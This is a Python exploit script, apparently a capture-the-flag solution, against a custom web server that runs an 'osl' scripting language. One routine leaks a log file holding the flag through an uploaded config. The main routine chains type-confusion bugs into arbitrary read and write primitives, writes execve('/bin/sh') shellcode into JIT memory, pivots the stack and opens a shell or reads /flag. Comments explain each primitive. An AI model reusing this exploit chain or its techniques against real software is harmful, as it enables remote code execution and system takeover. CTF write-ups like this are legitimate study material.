-
Notifications
You must be signed in to change notification settings - Fork 2
/
exploit.py
executable file
·365 lines (280 loc) · 11.1 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
#!/usr/bin/env python
from os.path import *
import re
import random
import string
import time
import sys
import traceback
import requests
import click
from pwn import *
context.arch = 'amd64'
context.log_level = 'error'
HOST = 'localhost'
PORT = 8080
DEBUG = 0
TIMEOUT = 3.0
# exec ./exploit.py --help for usage notes
@click.group()
def cli():
pass
@cli.command()
@click.option('-h', '--host', default='localhost')
@click.option('-p', '--port', type=int, default=8080)
def exploit1(host, port):
print 'Target: {}:{}'.format(host, port)
print 'Running exploit print log'
global HOST, PORT
HOST = host
PORT = port
do_print_log_exploit()
@cli.command()
@click.option('-h', '--host', default='localhost')
@click.option('-p', '--port', type=int, default=8080)
@click.option('--shell', is_flag=True)
def exploit2(host, port, shell):
print 'Target: {}:{}'.format(host, port)
print 'Running exploit type confusion'
global HOST, PORT
HOST = host
PORT = port
do_type_confusion_exploit(shell=shell)
def do_print_log_exploit():
# This is the plan:
# - upload an osl file that does "print log"
# - upload config so that mode is osl respectively, log=flag
# - GET the osl file
status_code, upload_osl_fn, io = do_upload_file(data='print log;')
assert status_code == 200
log_test_config = '''
server {{
server_name "dumplog.com";
root "uploads";
log "flag";
location "/{upload_osl_fn}" {{
mode osl;
}}
}}
'''.format(upload_osl_fn=upload_osl_fn)
if DEBUG:
print 'upload_osl_fn: ' + upload_osl_fn
print 'log_test_config: ' + log_test_config
status_code, _, io = do_upload_config(data=log_test_config, io=io)
assert status_code == 200
status_code, content, _ = do_get(host='dumplog.com', path='/{}'.format(upload_osl_fn), io=io)
assert status_code == 200
flag = content.strip()
print 'FLAG: ' + flag
return True
def do_type_confusion_exploit(shell=False):
context.log_level = 'info'
io = setup_osl_config()
'''Some useful snippets (not necessarily for this specific exploit):
# relative read from the "asd" ptr
x = 1 + "asd"; print x;
# relative write from the "asd" ptr
x = "aaaaa";
y = 1 + x;
y = "bbb";
print x;
# this prints "abbba"
# arbitrary read 1 (the bug is that "store int" does not set the len)
x = "aaaaaaaaaaaaaaaa"; x = 93824992261263; print x;
# this reads from the 938... address
# arbitrary read 2 (the bug is that print a huge number will overflow to the len field)
x = 100000000; print x; x = <addr>; print x; del x;
# the "del" is not strictly necessary, but it makes this code easier to reuse
# arbitrary write 1
- x = 100000000; print x; x = <where>; x = "AAAAAAAA"; del x;
- this will write AAAAAAAA to <where>
- this works because:
- 1) the print of huge number will overflow on the len. this
slot will be treated as a str from now on.
- 2) x = 123 will just overwrite the str ptr, not the len (due
to a bug in store int)
- 3) x = "AAAAAAAA"; this will trigger a str assignment: the
ptr will be used to know "where" to write, achieving
arbitrary write.
# leak pointer to jitted area:
- store a string in a variable. If the string is short, the first 8
bytes of the 32 bytes string contains a pointer to the jitter memory.
- 'x = "asd"; y = x+0; print y;'
- y will contain the ptr relative to the jitter memory + int("asd")
(because "asd" is stored in 16 bytes adjiacent to ptr to the string.
This exploit the bug that the sum (and other operations) assume the
operands are integer.
# leak pointer to stack, libc, etc.
- from a leak to the jit area, you can leak the stack pointer from the
metadata, and then the libc and other structures
'''
'''
Notes on this specific exploit:
- leak ptr to jitter area:
- x = "asd"; y = x+0; print y;
- use arbitrary write 1 to write a execve(/bin/sh) shellcode to jit_mem_addr+0x100
- use arbitrary write 1 to write, at the end of the shellcode, address of jit_mem_addr+0x100
- this will be used by the final "ret" in the epilog
- use arbitrary write 1 to write to the saved stack pointer, pivoting the stack to jit_mem_addr+0x100
- the epilog code will pop the shellcode in all registers. Eventually, the ret will load jit_mem_addr+0x100 address.
- the execution is now transfered to the shellcode, getting you a shell (or the flag)
'''
def addr_to_escaped_str(addr):
assert type(addr) in [int, long]
out = '\\x' + '\\x'.join(map(lambda x: '%02x' % ord(x), p64(addr)))
return out
op = 'x = "asd"; y = x+0; print y;'
output = run_osl_program(io, op)
jit_mem_addr = int(output.strip()) - int('dsa'.encode('hex'), 16) - 16
print 'jit_mem_addr: ' + hex(jit_mem_addr)
text_mem_addr = jit_mem_addr + 0x500
saved_stack_addr = jit_mem_addr - 0x10
def gen_write_64(where, what):
assert type(where) in [int, long]
assert type(what) in [int, long]
op = 'x = 100000000; print x; x = {:d}; x = "{}"; del x;\n'.format(
where, addr_to_escaped_str(what))
return op
shellcode = asm(shellcraft.sh())
assert len(shellcode) == 48
op = ''
curr_idx = 0
op += gen_write_64(jit_mem_addr+0x100+curr_idx, u64(shellcode[curr_idx:curr_idx+8])); curr_idx+=8;
op += gen_write_64(jit_mem_addr+0x100+curr_idx, u64(shellcode[curr_idx:curr_idx+8])); curr_idx+=8
op += gen_write_64(jit_mem_addr+0x100+curr_idx, u64(shellcode[curr_idx:curr_idx+8])); curr_idx+=8
op += gen_write_64(jit_mem_addr+0x100+curr_idx, u64(shellcode[curr_idx:curr_idx+8])); curr_idx+=8
op += gen_write_64(jit_mem_addr+0x100+curr_idx, u64(shellcode[curr_idx:curr_idx+8])); curr_idx+=8
op += gen_write_64(jit_mem_addr+0x100+curr_idx, u64(shellcode[curr_idx:curr_idx+8])); curr_idx+=8
op += gen_write_64(jit_mem_addr+0x100+curr_idx, u64("IIIIIIII")); curr_idx+=8
op += gen_write_64(jit_mem_addr+0x100+curr_idx, u64("HHHHHHHH")); curr_idx+=8
op += gen_write_64(jit_mem_addr+0x100+curr_idx, u64("GGGGGGGG")); curr_idx+=8
op += gen_write_64(jit_mem_addr+0x100+curr_idx, u64("FFFFFFFF")); curr_idx+=8
op += gen_write_64(jit_mem_addr+0x100+curr_idx, u64("EEEEEEEE")); curr_idx+=8
op += gen_write_64(jit_mem_addr+0x100+curr_idx, u64("DDDDDDDD")); curr_idx+=8
op += gen_write_64(jit_mem_addr+0x100+curr_idx, u64("CCCCCCCC")); curr_idx+=8
op += gen_write_64(jit_mem_addr+0x100+curr_idx, u64("BBBBBBBB")); curr_idx+=8
op += gen_write_64(jit_mem_addr+0x100+curr_idx, u64("AAAAAAAA")); curr_idx+=8
op += gen_write_64(jit_mem_addr+0x100+curr_idx, jit_mem_addr+0x100); curr_idx+=8
# pivot stack to jit_mem_addr
op += gen_write_64(saved_stack_addr, jit_mem_addr+0x100)
print 'OP: %s' % op
output = run_osl_program(io, op, wait_for_response=False)
if shell:
io.interactive()
else:
io.send('cat /flag\n')
flag = io.recv(4096).strip()
print 'FLAG: %s' % flag
io.close()
return True
def do_get(host, path, io=None, close_io=True, wait_for_response=True):
io = handle_http_request('GET', host=host, path=path, io=io)
if wait_for_response:
status_code, content = handle_http_response(io, close_io=close_io)
else:
status_code = 200
content = ''
if close_io:
io.close()
io = None
return status_code, content, io
def do_upload_file(data, io=None, close_io=False):
io = handle_http_request('UF', data=data, io=io)
status_code, content = handle_http_response(io, close_io=close_io)
if close_io:
io.close()
io = None
return status_code, content, io
def do_upload_config(data, io=None, close_io=False):
io = handle_http_request('UC', data=data, io=io)
status_code, content = handle_http_response(io, close_io=close_io)
if close_io:
io.close()
io = None
return status_code, content, io
def handle_http_request(method, host=None, path=None, data=None, io=None):
assert method in ['GET', 'UF', 'UC']
if host is None:
host = 'doesnotmatter.com'
if path is None:
path = '/'
if DEBUG:
print 'method: {}, host: {}, path: {}, data: {}'.format(
method, host, path, 'yes' if data is not None else 'no')
if io is None:
if DEBUG:
print 'opening new connection'
io = remote(HOST, PORT)
io.send('{} {} HTTP/1.1\r\n'.format(method, path))
io.send('Host: {}\r\n'.format(host))
if data is not None:
io.send('Content-Length: {}\r\n'.format(len(data)))
io.send('\r\n')
if data is not None:
io.send(data)
return io
def handle_http_response(io, close_io=True):
if TIMEOUT is not None:
first_line = io.recvuntil('\r\n', timeout=TIMEOUT)
else:
first_line = io.recvuntil('\r\n')
tokens = first_line.strip().split(' ', 2)
assert tokens[0] == 'HTTP/1.1'
status_code = int(tokens[1])
status_msg = tokens[2]
# print status_code, status_msg
# parse headers
headers = {}
while True:
if TIMEOUT is not None:
line = io.recvuntil('\r\n', timeout=TIMEOUT)
else:
line = io.recvuntil('\r\n')
line = line.strip()
if line == '': break
# print line
assert line.find(':') != -1
key, value = line.split(':', 1)
value = value.strip()
headers[key] = value
# print 'Headers: {}'.format(headers)
# check mandatory headers
assert 'Server' in headers.keys()
assert 'Content-Type' in headers.keys()
assert 'Content-Length' in headers.keys()
assert 'Connection' in headers.keys()
expected_status_msg = {
200 : 'OK',
400 : 'Bad Request',
404 : 'Not Found',
}
assert status_msg == expected_status_msg[status_code]
content_len = int(headers['Content-Length'])
if content_len > 0:
content = io.recv(content_len)
else:
content = ''
if close_io:
io.close()
return status_code, content
def setup_osl_config():
'''Open a connection, setup config, return io.'''
exec_osl_config = '''
server {
server_name "exploit.com";
root "uploads";
mode osl;
}
'''
status_code, _, io = do_upload_config(data=exec_osl_config)
assert status_code == 200
return io
def run_osl_program(io, osl_program, wait_for_response=True):
print 'Running: "{}"'.format(osl_program)
status_code, osl_fn, io = do_upload_file(data=osl_program, io=io)
assert status_code == 200
status_code, output, io = do_get(host='exploit.com', path='/{}'.format(osl_fn), io=io, close_io=False, wait_for_response=wait_for_response)
assert status_code == 200
return output
if __name__ == '__main__':
cli()